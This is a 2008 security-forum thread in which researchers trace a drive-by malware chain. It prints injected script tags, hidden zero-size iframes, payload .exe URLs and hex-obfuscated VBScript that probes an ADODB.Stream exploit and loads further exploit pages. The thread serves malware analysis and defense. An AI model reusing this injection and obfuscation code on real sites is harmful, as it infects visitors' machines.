Malware Domain List

Malware Related => Malicious Domains => Topic started by: pcaccent on May 30, 2008, 02:47:44 pm

Title: hxxp://www.xiaobaishan.net/dt/Help.asp
Post by: pcaccent on May 30, 2008, 02:47:44 pm
<script src=hxxp://www.chliyi.com/reg.js></script> -> <script src=hxxp://www.xiaobaishan.net/dt/Help.asp></script>

if (Korean Website){
       hxxp://www.xiaobaishan.net/dt/Help.asp
       hxxp://www.tlcn.net/cert/fuckkr.exe
        }
 else{
       hxxp://www.xiaobaishan.net/dt/us/Help.asp
       hxxp://www.jj120.net/inc/fuckjp.exe
       }

new.htm, help.htm, real.htm......
Title: Re: hxxp://www.xiaobaishan.net/dt/Help.asp
Post by: JohnC on May 30, 2008, 07:22:12 pm
If you don't use chliyi.com/reg.js as the referrer you seem to get a blank 200 page, but if you use that referrer you get

Code: [Select]
document.writeln("<iframe src=http://www.xiaobaishan.net/dt/info.htm width=0 height=0></iframe>");
That page gives:

Code: [Select]
<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622E5365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336220D0A0953657420506F70203D204F622E4372656174656F626A656374282241646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F63756D656E742E77726974652028223C694672616D65207352633D7265616C2E68746D2077696474683D30206865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E77726974652028223C694672616D65207352633D6E65772E68746D2077696474683D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A0909446F63756D656E742E77726974652028223C694672616D65207352633D68656C702E68746D2077696474683D30206865696768743D303E3C2F696672416D453E22290D0A09456E642049660D0A3C2F5363726970743E"
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans) Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)
</Script>
<script language="javascript" src="http://count4.51yes.com/click.aspx?id=40090518&logo=12"></script>